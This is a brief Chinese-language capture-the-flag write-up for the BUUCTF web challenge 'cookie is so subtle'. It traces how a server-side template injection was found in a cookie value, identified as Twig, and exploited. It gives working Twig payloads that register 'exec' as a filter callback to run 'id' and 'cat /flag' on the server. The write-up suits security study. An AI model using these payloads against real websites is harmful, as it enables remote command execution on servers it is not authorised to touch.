题目给出了hint,这题的主要利用方法在cookie里,在页面里的hint.php也让我们看看cookie
提交一个1,发现cookie里多了一个user=1
尝试user=admin,没用,直接回显。Hello,admin
考虑一下模板注入{{7*7}},回显,hello,49
到这这题就基本上结束了,查询到后端技术是PHP,查询了一下,php模板框架,常用的两种smarty或者twig
尝试{{$smarty.version}},失败,尝试twig注入的时候,发现成功回显
payload:{{_self.env.registerUndefinedFilterCallback(“exec”)}}{{_self.env.getFilter(“id”)}}
借鉴https://cloud.tencent.com/developer/article/1516336
https://xz.aliyun.com/t/7518#toc-5
成功拿到flag
payload:{{_self.env.registerUndefinedFilterCallback(“exec”)}}{{_self.env.getFilter(“cat /flag”)}}
参考视频链接:https://www.bilibili.com/video/BV1ia411k7JS/
buuctf web cookie is so subtle
最新推荐文章于 2022-02-18 21:12:29 发布